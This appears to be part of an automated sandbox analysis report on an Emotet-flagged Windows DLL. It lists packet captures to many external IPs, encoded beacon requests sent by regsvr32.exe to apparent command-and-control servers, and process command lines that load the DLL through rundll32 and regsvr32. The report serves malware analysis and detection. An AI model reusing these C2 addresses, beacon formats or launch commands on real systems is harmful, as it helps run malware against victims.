                                                                        Jul 20, 2022 00:21:20.740828991 CEST80804986479.172.212.216192.168.2.4
                                                                        Jul 20, 2022 00:21:21.395634890 CEST498648080192.168.2.479.172.212.216
                                                                        Jul 20, 2022 00:21:21.428340912 CEST80804986479.172.212.216192.168.2.4
                                                                        Jul 20, 2022 00:21:21.448085070 CEST498658080192.168.2.4103.221.221.247
                                                                        Jul 20, 2022 00:21:21.662029982 CEST808049865103.221.221.247192.168.2.4
                                                                        Jul 20, 2022 00:21:22.176954031 CEST498658080192.168.2.4103.221.221.247
                                                                        Jul 20, 2022 00:21:22.389219999 CEST808049865103.221.221.247192.168.2.4
                                                                        Jul 20, 2022 00:21:22.895668983 CEST498658080192.168.2.4103.221.221.247
                                                                        Jul 20, 2022 00:21:23.110194921 CEST808049865103.221.221.247192.168.2.4
                                                                        Jul 20, 2022 00:21:23.172842026 CEST4986680192.168.2.458.227.42.236
                                                                        Jul 20, 2022 00:21:26.177191973 CEST4986680192.168.2.458.227.42.236
                                                                        Jul 20, 2022 00:21:32.181190014 CEST4986680192.168.2.458.227.42.236
                                                                        Jul 20, 2022 00:21:44.213305950 CEST49867443192.168.2.4192.99.251.50
                                                                        Jul 20, 2022 00:21:44.213351965 CEST44349867192.99.251.50192.168.2.4
                                                                        Jul 20, 2022 00:21:44.213468075 CEST49867443192.168.2.4192.99.251.50
                                                                        Jul 20, 2022 00:21:44.214363098 CEST49867443192.168.2.4192.99.251.50
                                                                        Jul 20, 2022 00:21:44.214389086 CEST44349867192.99.251.50192.168.2.4
                                                                        Jul 20, 2022 00:22:16.586654902 CEST49867443192.168.2.4192.99.251.50
                                                                        Jul 20, 2022 00:22:16.806329012 CEST498688080192.168.2.4185.157.82.211
                                                                        Jul 20, 2022 00:22:19.811513901 CEST498688080192.168.2.4185.157.82.211
                                                                        Jul 20, 2022 00:22:25.827936888 CEST498688080192.168.2.4185.157.82.211
                                                                        Jul 20, 2022 00:22:37.858102083 CEST498698080192.168.2.4159.8.59.82
                                                                        Jul 20, 2022 00:22:40.860141993 CEST498698080192.168.2.4159.8.59.82
                                                                        Jul 20, 2022 00:22:46.860671997 CEST498698080192.168.2.4159.8.59.82
                                                                        Jul 20, 2022 00:22:58.878169060 CEST498708080192.168.2.451.91.7.5
                                                                        Jul 20, 2022 00:22:58.908149004 CEST80804987051.91.7.5192.168.2.4
                                                                        Jul 20, 2022 00:22:59.408660889 CEST498708080192.168.2.451.91.7.5
                                                                        Jul 20, 2022 00:22:59.436666965 CEST80804987051.91.7.5192.168.2.4
                                                                        Jul 20, 2022 00:22:59.940119982 CEST498708080192.168.2.451.91.7.5
                                                                        Jul 20, 2022 00:22:59.968211889 CEST80804987051.91.7.5192.168.2.4
                                                                        Jul 20, 2022 00:22:59.973972082 CEST4987280192.168.2.4131.100.24.231
                                                                        Jul 20, 2022 00:23:00.113894939 CEST8049872131.100.24.231192.168.2.4
                                                                        Jul 20, 2022 00:23:00.114065886 CEST4987280192.168.2.4131.100.24.231
                                                                        Jul 20, 2022 00:23:00.192707062 CEST4987280192.168.2.4131.100.24.231
                                                                        Jul 20, 2022 00:23:00.331798077 CEST8049872131.100.24.231192.168.2.4
                                                                        Jul 20, 2022 00:23:00.350327015 CEST8049872131.100.24.231192.168.2.4
                                                                        Jul 20, 2022 00:23:00.350377083 CEST8049872131.100.24.231192.168.2.4
                                                                        Jul 20, 2022 00:23:00.350548029 CEST4987280192.168.2.4131.100.24.231
                                                                        Jul 20, 2022 00:23:04.484003067 CEST4987280192.168.2.4131.100.24.231
                                                                        Jul 20, 2022 00:23:04.624656916 CEST8049872131.100.24.231192.168.2.4
                                                                        Jul 20, 2022 00:23:04.624757051 CEST4987280192.168.2.4131.100.24.231

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jul 20, 2022 00:22:43.090192080 CEST6149753192.168.2.48.8.8.8
                                                                        Jul 20, 2022 00:22:44.660972118 CEST5789053192.168.2.48.8.8.8

                                                                        ICMP Packets

                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                        Jul 20, 2022 00:20:16.266737938 CEST120.50.40.183192.168.2.460b2(Unknown)Destination Unreachable
                                                                        Jul 20, 2022 00:20:19.302870035 CEST120.50.40.183192.168.2.460b2(Unknown)Destination Unreachable
                                                                        Jul 20, 2022 00:20:25.305701017 CEST120.50.40.183192.168.2.460b2(Unknown)Destination Unreachable

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Jul 20, 2022 00:22:43.090192080 CEST192.168.2.48.8.8.80x884cStandard query (0)time.windows.comA (IP address)IN (0x0001)
                                                                        Jul 20, 2022 00:22:44.660972118 CEST192.168.2.48.8.8.80x1858Standard query (0)time.windows.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Jul 20, 2022 00:22:43.113759995 CEST8.8.8.8192.168.2.40x884cNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                        Jul 20, 2022 00:22:44.683568954 CEST8.8.8.8192.168.2.40x1858No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • 149.56.128.192
                                                                        • 46.55.222.11

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.449762149.56.128.192443C:\Windows\SysWOW64\regsvr32.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2022-07-19 22:19:43 UTC0OUTGET /SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX HTTP/1.1
                                                                        Cookie: wd=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI+fnIMfAI5oXYW5JqiwY3vIUlQBUwfTw48YkmxLCfsNjgx6F20LQV3Hnux9vPTgtjjTh1sYYnbNkqrHAkwHKUzWJuie4H3uJ+0/v2jViJz29FfNeDiPeJZqmSc76S+b
                                                                        Host: 149.56.128.192
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.44986346.55.222.11443C:\Windows\SysWOW64\regsvr32.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2022-07-19 22:21:19 UTC0OUTGET /TBwKHjQjVeCWIQFS HTTP/1.1
                                                                        Cookie: TzD=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI9Ih3e+pR2YRWgAeau9SKu/amPhx+vBX8EeVceLhJI1Cl5c/CGgAhr7yQ63yo30L73FGkUea/TvEpxNO3PjqOskzZcORWqX5SDpz1exfeePjzjvPRMWMpzyGCnmStacLsD4YfqerzQ/buYpgMei8ILwW16H6ENPPQ==
                                                                        Host: 46.55.222.11
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2022-07-19 22:21:20 UTC0INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Tue, 19 Jul 2022 22:21:19 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        2022-07-19 22:21:20 UTC1INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:00:19:36
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll"
                                                                        Imagebase:0xe90000
                                                                        File size:116736 bytes
                                                                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:1
                                                                        Start time:00:19:37
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
                                                                        Imagebase:0x1190000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:2
                                                                        Start time:00:19:37
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll
                                                                        Imagebase:0xa20000
                                                                        File size:20992 bytes
                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.250264890.0000000004DF1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.250264890.0000000004DF1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.250193606.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.250193606.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:3
                                                                        Start time:00:19:37
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
                                                                        Imagebase:0x860000
                                                                        File size:61952 bytes
                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.246760873.0000000003530000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.246760873.0000000003530000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.246960941.0000000004F11000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.246960941.0000000004F11000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:4
                                                                        Start time:00:19:37
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllRegisterServer
                                                                        Imagebase:0x860000
                                                                        File size:61952 bytes
                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.246952927.0000000002940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.246952927.0000000002940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:5
                                                                        Start time:00:19:41
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllUnregisterServer
                                                                        Imagebase:0x860000
                                                                        File size:61952 bytes
                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:6
                                                                        Start time:00:19:41
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Arwhu\ttgk.pdy"
                                                                        Imagebase:0xa20000
                                                                        File size:20992 bytes
                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.761637752.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.761637752.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:10
                                                                        Start time:00:19:58
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:11
                                                                        Start time:00:19:59
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:12
                                                                        Start time:00:19:59
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:13
                                                                        Start time:00:20:01
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:14
                                                                        Start time:00:20:01
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:15
                                                                        Start time:00:20:02
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\SgrmBroker.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                        Imagebase:0x7ff6e61c0000
                                                                        File size:163336 bytes
                                                                        MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:16
                                                                        Start time:00:20:03
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:18
                                                                        Start time:00:20:03
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:19
                                                                        Start time:00:20:05
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:20
                                                                        Start time:00:20:13
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:21
                                                                        Start time:00:20:24
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:23
                                                                        Start time:00:20:36
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:27
                                                                        Start time:00:21:04
                                                                        Start date:20/07/2022
                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                        Imagebase:0x7ff678970000
                                                                        File size:455656 bytes
                                                                        MD5 hash:A267555174BFA53844371226F482B86B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:28
                                                                        Start time:00:21:04
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff647620000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:34
                                                                        Start time:00:23:02
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -s W32Time
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        Disassembly

                                                                        No disassembly